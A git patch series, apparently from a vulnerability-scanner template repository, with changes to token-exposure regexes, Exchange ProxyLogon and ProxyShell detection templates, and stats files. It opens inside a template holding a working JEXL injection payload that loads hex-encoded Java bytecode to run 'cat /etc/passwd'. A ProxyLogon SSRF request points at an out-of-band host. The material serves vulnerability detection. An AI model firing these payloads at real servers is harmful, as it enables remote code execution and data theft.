72f4f626a6563740700a90c00aa00ab01000b676574526573706f6e73650100096765745772697465720100136a6176612f696f2f5072696e745772697465720c00ac002f0c00ad002801000f4578706c6f69742f546573743233340100136a6176612f6c616e672f457863657074696f6e0100116a6176612f6c616e672f52756e74696d6501000a67657452756e74696d6501001528294c6a6176612f6c616e672f52756e74696d653b01000465786563010027284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f50726f636573733b0100116a6176612f6c616e672f50726f6365737301000777616974466f7201000328294901000e676574496e70757453747265616d01001728294c6a6176612f696f2f496e70757453747265616d3b0100136a6176612f696f2f496e70757453747265616d010009617661696c61626c6501000472656164010007285b4249492949010005285b4229560100106a6176612f6c616e672f54687265616401000d63757272656e7454687265616401001428294c6a6176612f6c616e672f5468726561643b010007666f724e616d65010025284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f436c6173733b0100106765744465636c617265644669656c6401002d284c6a6176612f6c616e672f537472696e673b294c6a6176612f6c616e672f7265666c6563742f4669656c643b0100176a6176612f6c616e672f7265666c6563742f4669656c6401000d73657441636365737369626c65010004285a2956010003676574010026284c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100176a6176612f6c616e672f7265666c6563742f41727261790100096765744c656e677468010015284c6a6176612f6c616e672f4f626a6563743b2949010027284c6a6176612f6c616e672f4f626a6563743b49294c6a6176612f6c616e672f4f626a6563743b010008676574436c61737301001328294c6a6176612f6c616e672f436c6173733b0100076765744e616d6501001428294c6a6176612f6c616e672f537472696e673b010006657175616c73010015284c6a6176612f6c616e672f4f626a6563743b295a0100096765744d6574686f64010040284c6a6176612f6c616e672f537472696e673b5b4c6a6176612f6c616e672f436c6173733b294c6a6176612f6c616e672f7265666c6563742f4d6574686f643b0100186a6176612f6c616e672f7265666c6563742f4d6574686f64010006696e766f6b65010039284c6a6176612f6c616e672f4f626a6563743b5b4c6a6176612f6c616e672f4f626a6563743b294c6a6176612f6c616e672f4f626a6563743b0100057772697465010005636c6f736500210026001f000000000002000100270028000100290000002f00010001000000052ab70001b100000002002a00000006000100000009002b0000000c000100000005002c002d00000009002e002f0002002900000304000400140000013eb800022ab600034c2bb60004572bb600054d2cb60006bc084e2c2d032cb60006b6000757bb0008592db700093a04b8000a3a05120b57120cb8000d120eb6000f3a06190604b6001019061905b600113a07120b571212b8000d3a0819081213b6000f3a09190904b6001019091907b600113a0a120b571214b8000d3a0b190b1215b6000f3a0c190c04b60010013a0d03360e150e190ab80016a2003e190a150eb800173a0f190fc70006a70027190c190fb600113a0d190dc70006a70016190db60018b60019121ab6001b990006a70009840e01a7ffbe190db600183a0e190e121c03bd001db6001e190d03bd001fb600203a0f190fb600183a101910122103bd001db6001e190f03bd001fb600203a111911b600183a121912122203bd001db6001e191103bd001fb60020c000233a1319131904b600241913b60025b100000003002a0000009600250000001600080017000d0018001200190019001a0024001b002e001d0033001f004200200048002100510023005b002500640026006a002700730029007d002a0086002b008c002d008f002f009c003100a5003200aa003300ad003500b6003600bb003700be003900ce003a00d1002f00d7003d00de003e00f4003f00fb004001110041011800420131004401380045013d0049002b000000de001600a5002c00300031000f0092004500320033000e0000013e003400350000000801360036003700010012012c00380039000200190125003a003b0003002e0110003c003500040033010b003d003e0005004200fc003f00400006005100ed004100310007005b00e3004200430008006400da004400400009007300cb00450031000a007d00c100460043000b008600b800470040000c008f00af00480031000d00de006000490043000e00f4004a004a0031000f00fb0043004b004300100111002d004c0031001101180026004d004300120131000d004e004f00130050000000340005005b00e3004200510008007d00c100460051000b00de006000490051000e00fb0043004b0051001001180026004d005100120052000000040001005300010054000000020055'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'cat /etc/passwd');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"} From 166049bf0bd9437e08901f7443e70332ac9b9f6a Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 12 Aug 2021 09:53:33 -0500 Subject: [PATCH 1602/4083] Update general-tokens.yaml more FP work --- exposures/tokens/generic/general-tokens.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/exposures/tokens/generic/general-tokens.yaml b/exposures/tokens/generic/general-tokens.yaml index 0516c4ce0d..232e3a0920 100644 --- a/exposures/tokens/generic/general-tokens.yaml +++ b/exposures/tokens/generic/general-tokens.yaml @@ -25,9 +25,11 @@ requests: - type: regex part: body regex: - - '(?i)key(up|down|press|boardnavigation)' - - '(?i)password(lessauth|requirementsashtmllist|emailnotfoundmessage|label|errormessage|message|_checkemail_title|_newfield_retype|_text_new|login_submit|_has_expired_title|_has_expired_text)' - - '(?i)keys_(close|previous|next|zoom|play_pause)' + - '(?i)key(sinternal|up|down|press|boardnavigation|words?|board|ebrow|board_fill|_retry_interval|_fetched|_expiresat|board_shortcuts|s_close|s_previous|s_next|s_zoom|s_play_pause)' + - '(?i)password(lessauth|requirementsashtmllist|emailnotfoundmessage|label|errormessage|message|_checkemail_title|_newfield_retype|_text_new|login_submit|_has_expired_title|_has_expired_text|_error|_hint|_strength)' + - '(?i)(?!native)|(.*keybindings)' + - '(?i)(layout|a)key' + - '(?i)keyword' condition: or negative: true From c9daa11bd85b63c3746e092612b9bbfae125595c Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Thu, 12 Aug 2021 09:54:57 -0500 Subject: [PATCH 1603/4083] Update general-tokens.yaml --- exposures/tokens/generic/general-tokens.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposures/tokens/generic/general-tokens.yaml b/exposures/tokens/generic/general-tokens.yaml index 232e3a0920..4effb1a176 100644 --- a/exposures/tokens/generic/general-tokens.yaml +++ b/exposures/tokens/generic/general-tokens.yaml @@ -29,7 +29,6 @@ requests: - '(?i)password(lessauth|requirementsashtmllist|emailnotfoundmessage|label|errormessage|message|_checkemail_title|_newfield_retype|_text_new|login_submit|_has_expired_title|_has_expired_text|_error|_hint|_strength)' - '(?i)(?!native)|(.*keybindings)' - '(?i)(layout|a)key' - - '(?i)keyword' condition: or negative: true From b69cd23cf486049df64b29a574571b36018e4e08 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 12 Aug 2021 21:24:09 +0530 Subject: [PATCH 1604/4083] minor updates --- cves/2021/CVE-2021-26855.yaml | 17 ++++------------- 1 file changed, 4 insertions(+), 13 deletions(-) diff --git a/cves/2021/CVE-2021-26855.yaml b/cves/2021/CVE-2021-26855.yaml index f5df4f2484..9c0ce7bd98 100644 --- a/cves/2021/CVE-2021-26855.yaml +++ b/cves/2021/CVE-2021-26855.yaml @@ -6,7 +6,7 @@ info: severity: critical description: | Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-26412, CVE-2021-26854, CVE-2021-26857, CVE-2021-26858, CVE-2021-27065, CVE-2021-27078. - tags: cve,cve2021,ssrf,rce,exchange + tags: cve,cve2021,ssrf,rce,exchange,oob reference: | - https://proxylogon.com/#timeline - https://raw.githubusercontent.com/microsoft/CSS-Exchange/main/Security/http-vuln-cve2021-26855.nse @@ -18,19 +18,10 @@ requests: - | GET /owa/auth/x.js HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Cookie: X-AnonResource=true; X-AnonResource-Backend=somethingnonexistent/ecp/default.flt?~3; X-BEResource=somethingnonexistent/owa/auth/logon.aspx?~3; - Accept-Language: en - Connection: close + Cookie: X-AnonResource=true; X-AnonResource-Backend={{interactsh-url}}/ecp/default.flt?~3; - matchers-condition: and matchers: - - type: status - status: - - 500 - - 503 - - type: word + part: interactsh_protocol # Confirms the HTTP Interaction words: - - 'X-Calculatedbetarget: somethingnonexistent' - part: header \ No newline at end of file + - "http" \ No newline at end of file From c537e2ccd4c9ed0c91a965012f52c110993badc7 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 12 Aug 2021 22:09:42 +0530 Subject: [PATCH 1605/4083] minor update --- cves/2021/CVE-2021-34473.yaml | 12 ++++++------ 1 file changed, 6 insertions(+), 6 deletions(-) diff --git a/cves/2021/CVE-2021-34473.yaml b/cves/2021/CVE-2021-34473.yaml index d68b694bb0..22b856d488 100644 --- a/cves/2021/CVE-2021-34473.yaml +++ b/cves/2021/CVE-2021-34473.yaml @@ -2,19 +2,18 @@ id: CVE-2021-34473 info: name: Exchange Server SSRF (ProxyShell) - author: arcc + author: arcc,intx0x80,dwisiswant0,r3dg33k severity: critical description: | Microsoft Exchange Server Remote Code Execution Vulnerability This CVE ID is unique from CVE-2021-31196, CVE-2021-31206. reference: | - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34473 - - https://www.youtube.com/watch?v=FC6iHw258RI - - https://portswigger.net/daily-swig/a-whole-new-attack-surface-researcher-orange-tsai-documents-proxylogon-exploits-against-microsoft-exchange-server + - https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html + - https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1 tags: cve,cve2021,ssrf,rce,exchange requests: - method: GET - redirects: true path: - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/owa/?&Email=autodiscover/autodiscover.json%3F@test.com' - '{{BaseURL}}/autodiscover/autodiscover.json?@test.com/mapi/nspi/?&Email=autodiscover/autodiscover.json%3F@test.com' @@ -22,6 +21,7 @@ requests: matchers: - type: word part: body + condition: or words: - - Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException - - Exchange MAPI/HTTP Connectivity Endpoint \ No newline at end of file + - "Microsoft.Exchange.Clients.Owa2.Server.Core.OwaADUserNotFoundException" + - "Exchange MAPI/HTTP Connectivity Endpoint" \ No newline at end of file From a8a292bd1e1a74e85fdd6b53edfdacdac05c0c93 Mon Sep 17 00:00:00 2001 From: sandeep Date: Thu, 12 Aug 2021 23:10:24 +0530 Subject: [PATCH 1606/4083] minor update --- cves/2016/CVE-2016-1000139.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2016/CVE-2016-1000139.yaml b/cves/2016/CVE-2016-1000139.yaml index 40f7544abc..3053e62231 100644 --- a/cves/2016/CVE-2016-1000139.yaml +++ b/cves/2016/CVE-2016-1000139.yaml @@ -1,7 +1,7 @@ id: CVE-2016-1000139 info: - name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - Unauthenticated Reflected Cross-Site Scripting (XSS) + name: Infusionsoft Gravity Forms Add-on <= 1.5.11 - XSS author: daffainfo severity: medium reference: | From 25c9c3ea85df739eb7314da2c12d228345cf2f5a Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 12 Aug 2021 19:26:50 +0000 Subject: [PATCH 1607/4083] Auto Generated Templates Stats [Thu Aug 12 19:26:50 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1342 +++++++++++++++++++++--------------------- TOP-10.md | 20 +- 3 files changed, 686 insertions(+), 678 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 2706b78f94..a77e990153 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":576},{"name":"panel","count":214},{"name":"xss","count":213},{"name":"wordpress","count":198},{"name":"exposure","count":196},{"name":"rce","count":183},{"name":"lfi","count":168},{"name":"cve2020","count":155},{"name":"wp-plugin","count":133},{"name":"tech","count":100},{"name":"cve2021","count":92},{"name":"config","count":91},{"name":"cve2019","count":86},{"name":"cve2018","count":74},{"name":"takeover","count":73},{"name":"","count":65},{"name":"token","count":64},{"name":"apache","count":64},{"name":"default-login","count":54},{"name":"cve2017","count":47},{"name":"file","count":46},{"name":"iot","count":44},{"name":"unauth","count":42},{"name":"oob","count":41},{"name":"sqli","count":35},{"name":"network","count":35},{"name":"cve2016","count":30},{"name":"ssrf","count":30},{"name":"workflow","count":29},{"name":"oracle","count":29},{"name":"logs","count":29},{"name":"misc","count":27},{"name":"jira","count":26},{"name":"atlassian","count":26},{"name":"redirect","count":25},{"name":"listing","count":24},{"name":"aem","count":19},{"name":"cisco","count":18},{"name":"sap","count":18},{"name":"cve2015","count":18},{"name":"disclosure","count":17},{"name":"springboot","count":15},{"name":"cve2014","count":14},{"name":"cve2012","count":14},{"name":"debug","count":14},{"name":"auth-bypass","count":13},{"name":"misconfig","count":13},{"name":"cve2011","count":13},{"name":"struts","count":13},{"name":"android","count":13},{"name":"jenkins","count":12},{"name":"adobe","count":12},{"name":"dns","count":12},{"name":"weblogic","count":12},{"name":"dlink","count":12},{"name":"zoho","count":11},{"name":"devops","count":11},{"name":"fuzz","count":11},{"name":"joomla","count":11},{"name":"php","count":11},{"name":"router","count":11},{"name":"cve2013","count":11},{"name":"magento","count":9},{"name":"cnvd","count":8},{"name":"xxe","count":8},{"name":"rails","count":8},{"name":"aws","count":8},{"name":"airflow","count":8},{"name":"ftp","count":8},{"name":"ruijie","count":8},{"name":"gitlab","count":8},{"name":"vmware","count":7},{"name":"cve2009","count":7},{"name":"login","count":7},{"name":"nginx","count":7},{"name":"scada","count":7},{"name":"laravel","count":6},{"name":"coldfusion","count":6},{"name":"backup","count":6},{"name":"rconfig","count":6},{"name":"citrix","count":6},{"name":"cve2010","count":6},{"name":"jetty","count":6},{"name":"cms","count":6},{"name":"api","count":6},{"name":"google","count":6},{"name":"solr","count":6},{"name":"dell","count":6},{"name":"drupal","count":5},{"name":"ibm","count":5},{"name":"iis","count":5},{"name":"ssti","count":5},{"name":"files","count":5},{"name":"fileupload","count":5},{"name":"java","count":5},{"name":"django","count":5},{"name":"headless","count":5},{"name":"netgear","count":5},{"name":"confluence","count":5},{"name":"circarlife","count":5},{"name":"dedecms","count":5},{"name":"wp-theme","count":5},{"name":"phpmyadmin","count":5},{"name":"lucee","count":5},{"name":"magmi","count":4},{"name":"nodejs","count":4},{"name":"artifactory","count":4},{"name":"asp","count":4},{"name":"windows","count":4},{"name":"vpn","count":4},{"name":"elastic","count":4},{"name":"thinkcmf","count":4},{"name":"webserver","count":4},{"name":"docker","count":4},{"name":"moodle","count":4},{"name":"jolokia","count":4},{"name":"thinkphp","count":4},{"name":"tomcat","count":4},{"name":"zimbra","count":4},{"name":"crlf","count":4},{"name":"solarwinds","count":4},{"name":"samsung","count":4},{"name":"traversal","count":4},{"name":"deserialization","count":4},{"name":"hongdian","count":4},{"name":"nosqli","count":3},{"name":"slack","count":3},{"name":"lfr","count":3},{"name":"printer","count":3},{"name":"zabbix","count":3},{"name":"r-seenet","count":3},{"name":"symfony","count":3},{"name":"cve2008","count":3},{"name":"ofbiz","count":3},{"name":"openssh","count":3},{"name":"git","count":3},{"name":"vbulletin","count":3},{"name":"tikiwiki","count":3},{"name":"fanruan","count":3},{"name":"grafana","count":3},{"name":"ssh","count":3},{"name":"backups","count":3},{"name":"microstrategy","count":3},{"name":"oa","count":3},{"name":"microsoft","count":3},{"name":"caucho","count":3},{"name":"zhiyuan","count":3},{"name":"wso2","count":3},{"name":"kafka","count":3},{"name":"amazon","count":3},{"name":"kubernetes","count":3},{"name":"bypass","count":3},{"name":"ebs","count":3},{"name":"resin","count":3},{"name":"bitrix","count":3},{"name":"nacos","count":3},{"name":"itop","count":3},{"name":"terramaster","count":3},{"name":"opensis","count":3},{"name":"kevinlab","count":3},{"name":"hp","count":3},{"name":"springcloud","count":3},{"name":"mongodb","count":3},{"name":"log","count":3},{"name":"httpd","count":3},{"name":"fpd","count":3},{"name":"targa","count":3},{"name":"rstudio","count":2},{"name":"leak","count":2},{"name":"smtp","count":2},{"name":"bigip","count":2},{"name":"splunk","count":2},{"name":"nagios","count":2},{"name":"injection","count":2},{"name":"chiyu","count":2},{"name":"github","count":2},{"name":"avantfax","count":2},{"name":"linkerd","count":2},{"name":"webcam","count":2},{"name":"vrealize","count":2},{"name":"frp","count":2},{"name":"backdoor","count":2},{"name":"pega","count":2},{"name":"couchdb","count":2},{"name":"showdoc","count":2},{"name":"akkadian","count":2},{"name":"sharepoint","count":2},{"name":"xxljob","count":2},{"name":"yapi","count":2},{"name":"wordfence","count":2},{"name":"status","count":2},{"name":"trixbox","count":2},{"name":"horde","count":2},{"name":"rockethchat","count":2},{"name":"globalprotect","count":2},{"name":"chamilo","count":2},{"name":"nextjs","count":2},{"name":"emerge","count":2},{"name":"paloalto","count":2},{"name":"sonarqube","count":2},{"name":"phpcollab","count":2},{"name":"voipmonitor","count":2},{"name":"hashicorp","count":2},{"name":"mida","count":2},{"name":"intrusive","count":2},{"name":"guacamole","count":2},{"name":"kentico","count":2},{"name":"sonicwall","count":2},{"name":"natshell","count":2},{"name":"grav","count":2},{"name":"openfire","count":2},{"name":"hjtcloud","count":2},{"name":"cve2007","count":2},{"name":"spark","count":2},{"name":"oauth","count":2},{"name":"cve2005","count":2},{"name":"service","count":2},{"name":"plesk","count":2},{"name":"glassfish","count":2},{"name":"cache","count":2},{"name":"odoo","count":2},{"name":"strapi","count":2},{"name":"smb","count":2},{"name":"ecology","count":2},{"name":"fortios","count":2},{"name":"idrac","count":2},{"name":"keycloak","count":2},{"name":"seeyon","count":2},{"name":"saltstack","count":2},{"name":"igs","count":2},{"name":"proxy","count":2},{"name":"akamai","count":2},{"name":"activemq","count":2},{"name":"hpe","count":2},{"name":"flir","count":2},{"name":"rockmongo","count":2},{"name":"icewarp","count":2},{"name":"jsf","count":2},{"name":"prometheus","count":2},{"name":"jellyfin","count":2},{"name":"kibana","count":2},{"name":"hasura","count":2},{"name":"nexus","count":2},{"name":"mail","count":2},{"name":"openam","count":2},{"name":"dolibarr","count":2},{"name":"huawei","count":2},{"name":"ucmdb","count":2},{"name":"waf","count":2},{"name":"jboss","count":2},{"name":"maian","count":2},{"name":"shellshock","count":2},{"name":"azure","count":2},{"name":"dos","count":2},{"name":"telerik","count":2},{"name":"jeedom","count":2},{"name":"fortigates","count":1},{"name":"nette","count":1},{"name":"nps","count":1},{"name":"mantis","count":1},{"name":"redwood","count":1},{"name":"tika","count":1},{"name":"codemeter","count":1},{"name":"maccmsv10","count":1},{"name":"cse","count":1},{"name":"glpi","count":1},{"name":"gloo","count":1},{"name":"npm","count":1},{"name":"alibaba","count":1},{"name":"ganglia","count":1},{"name":"rsyncd","count":1},{"name":"shopware","count":1},{"name":"octobercms","count":1},{"name":"accela","count":1},{"name":"alerta","count":1},{"name":"fuelcms","count":1},{"name":"appweb","count":1},{"name":"sqlite","count":1},{"name":"addpac","count":1},{"name":"getsimple","count":1},{"name":"rdp","count":1},{"name":"domxss","count":1},{"name":"st","count":1},{"name":"kerbynet","count":1},{"name":"bigbluebutton","count":1},{"name":"commscope","count":1},{"name":"ntopng","count":1},{"name":"javamelody","count":1},{"name":"jenkin","count":1},{"name":"dnssec","count":1},{"name":"oscommerce","count":1},{"name":"zend","count":1},{"name":"sentry","count":1},{"name":"zmanda","count":1},{"name":"springframework","count":1},{"name":"emc","count":1},{"name":"scs","count":1},{"name":"exposures","count":1},{"name":"mcafee","count":1},{"name":"panos","count":1},{"name":"qdpm","count":1},{"name":"sourcebans","count":1},{"name":"scimono","count":1},{"name":"huijietong","count":1},{"name":"esmtp","count":1},{"name":"codeigniter","count":1},{"name":"traefik","count":1},{"name":"manageengine","count":1},{"name":"jfrog","count":1},{"name":"lotuscms","count":1},{"name":"node","count":1},{"name":"2014","count":1},{"name":"xmlchart","count":1},{"name":"fastcgi","count":1},{"name":"landrayoa","count":1},{"name":"sitecore","count":1},{"name":"ruby","count":1},{"name":"wiki","count":1},{"name":"embedthis","count":1},{"name":"acme","count":1},{"name":"moin","count":1},{"name":"javafaces","count":1},{"name":"liferay","count":1},{"name":"geutebruck","count":1},{"name":"ssl","count":1},{"name":"tensorboard","count":1},{"name":"visionhub","count":1},{"name":"lutron","count":1},{"name":"soar","count":1},{"name":"salesforce","count":1},{"name":"aspnuke","count":1},{"name":"achecker","count":1},{"name":"kyan","count":1},{"name":"blackboard","count":1},{"name":"enum","count":1},{"name":"upload","count":1},{"name":"idemia","count":1},{"name":"netsweeper","count":1},{"name":"wavemaker","count":1},{"name":"sprintful","count":1},{"name":"csrf","count":1},{"name":"zm","count":1},{"name":"webui","count":1},{"name":"email","count":1},{"name":"drone","count":1},{"name":"grails","count":1},{"name":"shopxo","count":1},{"name":"cve2006","count":1},{"name":"magicflow","count":1},{"name":"powercreator","count":1},{"name":"mariadb","count":1},{"name":"octoprint","count":1},{"name":"avalanche","count":1},{"name":"twitter-server","count":1},{"name":"livezilla","count":1},{"name":"xunchi","count":1},{"name":"woocomernce","count":1},{"name":"gotmls","count":1},{"name":"spf","count":1},{"name":"socomec","count":1},{"name":"varnish","count":1},{"name":"harbor","count":1},{"name":"stem","count":1},{"name":"auth","count":1},{"name":"xff","count":1},{"name":"prestashop","count":1},{"name":"lanproxy","count":1},{"name":"netis","count":1},{"name":"mediumish","count":1},{"name":"fortiweb","count":1},{"name":"extractor","count":1},{"name":"opentsdb","count":1},{"name":"dom","count":1},{"name":"linux","count":1},{"name":"dvwa","count":1},{"name":"lansweeper","count":1},{"name":"setup","count":1},{"name":"dotnet","count":1},{"name":"axis","count":1},{"name":"episerver","count":1},{"name":"fastapi","count":1},{"name":"cocoon","count":1},{"name":"floc","count":1},{"name":"discord","count":1},{"name":"redcap","count":1},{"name":"payara","count":1},{"name":"ems","count":1},{"name":"pyramid","count":1},{"name":"cofax","count":1},{"name":"mdb","count":1},{"name":"bitly","count":1},{"name":"discourse","count":1},{"name":"interlib","count":1},{"name":"duomicms","count":1},{"name":"vnc","count":1},{"name":"k8","count":1},{"name":"ec2","count":1},{"name":"upnp","count":1},{"name":"ricoh","count":1},{"name":"comodo","count":1},{"name":"zenario","count":1},{"name":"checkpoint","count":1},{"name":"wildfly","count":1},{"name":"cherokee","count":1},{"name":"optiLink","count":1},{"name":"mpsec","count":1},{"name":"opensmtpd","count":1},{"name":"yii","count":1},{"name":"mongo","count":1},{"name":"bookstack","count":1},{"name":"nc2","count":1},{"name":"subrion","count":1},{"name":"htmli","count":1},{"name":"labtech","count":1},{"name":"jeewms","count":1},{"name":"flink","count":1},{"name":"netrc","count":1},{"name":"webmin","count":1},{"name":"dvr","count":1},{"name":"nweb2fax","count":1},{"name":"darkstat","count":1},{"name":"jsp","count":1},{"name":"wmt","count":1},{"name":"goahead","count":1},{"name":"arl","count":1},{"name":"viewpoint","count":1},{"name":"spip","count":1},{"name":"hadoop","count":1},{"name":"ghost","count":1},{"name":"opensns","count":1},{"name":"smartsense","count":1},{"name":"keenetic","count":1},{"name":"servicedesk","count":1},{"name":"seacms","count":1},{"name":"thinkadmin","count":1},{"name":"glances","count":1},{"name":"hiboss","count":1},{"name":"ruckus","count":1},{"name":"clave","count":1},{"name":"ilo4","count":1},{"name":"firebase","count":1},{"name":"tensorflow","count":1},{"name":"jnoj","count":1},{"name":"svnserve","count":1},{"name":"openemr","count":1},{"name":"resourcespace","count":1},{"name":"wondercms","count":1},{"name":"redhat","count":1},{"name":"yachtcontrol","count":1},{"name":"cerebro","count":1},{"name":"cloudinary","count":1},{"name":"servicenow","count":1},{"name":"api-manager","count":1},{"name":"acontent","count":1},{"name":"argussurveillance","count":1},{"name":"exchange","count":1},{"name":"lighttpd","count":1},{"name":"clockwatch","count":1},{"name":"empirecms","count":1},{"name":"favicon","count":1},{"name":"chinaunicom","count":1},{"name":"avtech","count":1},{"name":"ulterius","count":1},{"name":"concrete","count":1},{"name":"chevereto","count":1},{"name":"rhymix","count":1},{"name":"mautic","count":1},{"name":"panabit","count":1},{"name":"weiphp","count":1},{"name":"eprints","count":1},{"name":"zookeeper","count":1},{"name":"expressjs","count":1},{"name":"svn","count":1},{"name":"diris","count":1},{"name":"rabbitmq","count":1},{"name":"kong","count":1},{"name":"gespage","count":1},{"name":" default-login","count":1},{"name":"openrestry","count":1},{"name":"blind","count":1},{"name":"gitlist","count":1},{"name":"apos","count":1},{"name":"portainer","count":1},{"name":"ns","count":1},{"name":"adminer","count":1},{"name":"saltapi","count":1},{"name":"linkedin","count":1},{"name":"razor","count":1},{"name":"tamronos","count":1},{"name":"openx","count":1},{"name":"druid","count":1},{"name":"mysql","count":1},{"name":"kubeflow","count":1},{"name":"visualtools","count":1},{"name":"ueditor","count":1},{"name":"haproxy","count":1},{"name":"fortinet","count":1},{"name":"default","count":1},{"name":"opm","count":1},{"name":"vscode","count":1},{"name":"wamp","count":1},{"name":"myucms","count":1},{"name":"zcms","count":1},{"name":"spectracom","count":1},{"name":"tieline","count":1},{"name":"pippoint","count":1},{"name":"timeclock","count":1},{"name":"eyou","count":1},{"name":"robomongo","count":1},{"name":"rmc","count":1},{"name":"viewlinc","count":1},{"name":"sangfor","count":1},{"name":"totaljs","count":1},{"name":"mantisbt","count":1},{"name":"netdata","count":1},{"name":"wifisky","count":1},{"name":"solman","count":1},{"name":"nexusdb","count":1},{"name":"fortilogger","count":1},{"name":"linksys","count":1},{"name":"dotclear","count":1},{"name":"xml","count":1},{"name":"sgp","count":1},{"name":"tenda","count":1},{"name":"wazuh","count":1},{"name":"erp-nc","count":1},{"name":"mirai","count":1},{"name":"circontrol","count":1},{"name":"ioncube","count":1},{"name":"nedi","count":1},{"name":"monitorr","count":1},{"name":"wooyun","count":1},{"name":"opencast","count":1},{"name":"feifeicms","count":1},{"name":"froxlor","count":1},{"name":"bedita","count":1},{"name":"cgi","count":1},{"name":"tongda","count":1},{"name":"krweb","count":1},{"name":"nomad","count":1},{"name":"plastic","count":1},{"name":"dotnetnuke","count":1},{"name":"ssltls","count":1},{"name":"plc","count":1},{"name":"qvisdvr","count":1},{"name":"spring","count":1},{"name":"cobub","count":1},{"name":"realteo","count":1},{"name":"zte","count":1},{"name":"pagespeed","count":1},{"name":"triconsole","count":1},{"name":"bullwark","count":1},{"name":"sco","count":1},{"name":"centos","count":1},{"name":"influxdb","count":1},{"name":"ambari","count":1},{"name":"alertmanager","count":1},{"name":"biometrics","count":1},{"name":"trilithic","count":1},{"name":"apiman","count":1},{"name":"lg-nas","count":1},{"name":"beanshell","count":1},{"name":"centreon","count":1},{"name":"k8s","count":1},{"name":"fedora","count":1},{"name":"rfi","count":1},{"name":"proftpd","count":1},{"name":"faraday","count":1},{"name":"parentlink","count":1},{"name":"mailchimp","count":1},{"name":"clusterengine","count":1},{"name":"wing-ftp","count":1},{"name":"acexy","count":1},{"name":"klog","count":1},{"name":"cors","count":1},{"name":"openerp","count":1},{"name":"etouch","count":1},{"name":"db","count":1},{"name":"gridx","count":1},{"name":"phpunit","count":1},{"name":"pacsone","count":1},{"name":"node-red-dashboard","count":1},{"name":"starttls","count":1},{"name":"plugin","count":1},{"name":"webmodule-ee","count":1},{"name":"szhe","count":1},{"name":"plone","count":1},{"name":"pulsesecure","count":1},{"name":"cloudflare","count":1},{"name":"mongoshake","count":1},{"name":"circontrorl","count":1},{"name":"phpinfo","count":1},{"name":"sage","count":1},{"name":"mara","count":1},{"name":"jenzabar","count":1},{"name":"rmi","count":1},{"name":"blue-ocean","count":1},{"name":"selea","count":1},{"name":"nsasg","count":1},{"name":"turbocrm","count":1},{"name":"kafdrop","count":1},{"name":"majordomo2","count":1},{"name":"bolt","count":1},{"name":"zzzcms","count":1},{"name":"cacti","count":1},{"name":"csod","count":1},{"name":"sceditor","count":1},{"name":"tpshop","count":1},{"name":"nuxeo","count":1},{"name":"h3c-imc","count":1},{"name":"monitorix","count":1},{"name":"jquery","count":1},{"name":"synnefo","count":1},{"name":"finereport","count":1},{"name":"vsphere","count":1},{"name":"tapestry","count":1},{"name":"anchorcms","count":1},{"name":"uwsgi","count":1},{"name":"ecom","count":1},{"name":"sarg","count":1},{"name":"websvn","count":1},{"name":"redis","count":1},{"name":"memcached","count":1},{"name":"webftp","count":1},{"name":"doh","count":1},{"name":"metinfo","count":1},{"name":"nuuo","count":1},{"name":"yealink","count":1},{"name":"exacqvision","count":1},{"name":"expose","count":1},{"name":"sureline","count":1},{"name":"gateone","count":1},{"name":"clink-office","count":1},{"name":"tileserver","count":1},{"name":"b2evolution","count":1},{"name":"phpfusion","count":1},{"name":"phalcon","count":1},{"name":"heroku","count":1},{"name":"landray","count":1},{"name":"timesheet","count":1},{"name":"zyxel","count":1},{"name":"nordex","count":1},{"name":"lancom","count":1},{"name":"calendarix","count":1},{"name":"enumeration","count":1},{"name":"xvr","count":1},{"name":"wuzhicms","count":1},{"name":"vsftpd","count":1},{"name":"javascript","count":1},{"name":"qsan","count":1},{"name":"mobileiron","count":1},{"name":"rujjie","count":1},{"name":"swagger","count":1},{"name":"crm","count":1},{"name":"geddy","count":1},{"name":"postmessage","count":1},{"name":"emby","count":1},{"name":"hortonworks","count":1},{"name":"skywalking","count":1},{"name":"spidercontrol","count":1},{"name":"bash","count":1},{"name":"xdcms","count":1},{"name":"aruba","count":1},{"name":"webadmin","count":1},{"name":"camunda","count":1},{"name":"primetek","count":1},{"name":"office365","count":1},{"name":"jmx","count":1},{"name":"aura","count":1},{"name":"iptime","count":1},{"name":"moinmoin","count":1},{"name":"flash","count":1